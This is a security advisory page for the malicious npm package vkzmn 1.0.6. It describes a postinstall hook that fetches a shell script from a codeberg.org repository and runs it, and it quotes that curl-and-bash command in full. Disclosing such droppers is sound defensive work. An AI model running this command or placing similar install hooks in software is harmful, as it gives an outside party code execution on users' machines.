npm

vkzmn @1.0.6

Vulnerability report · Last retrieved from osv.dev July 9, 2026 at 1:25 AM UTC

Malicious

OSV ID

MAL-2026-6594

Ecosystem

npm

Summary

package.json declares a postinstall lifecycle hook that runs curl https://codeberg.org/atilalogical/worm_teste/raw/branch/main/down_procwork.sh -o d.sh; bash d.sh , auto-fetching a shell script from a mutable branch on a third-party codeberg.org account unrelated to the package publisher and piping it to bash on every npm install . The fetch is unpinned, unverified (no hash/signature), and the repository slug ( worm_teste ) and the package's empty metadata (no real description, author, or keywords; the package even lists itself as a dependency) indicate a throwaway dropper rather than a legitimate library. Installing this package gives the operator of the codeberg.org repository arbitrary code execution on the installer's machine.

Source: amazon-inspector (af074062a138c9e2bd27eca2a2de361f5858b524572027b0c7b9d259e6159abc)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.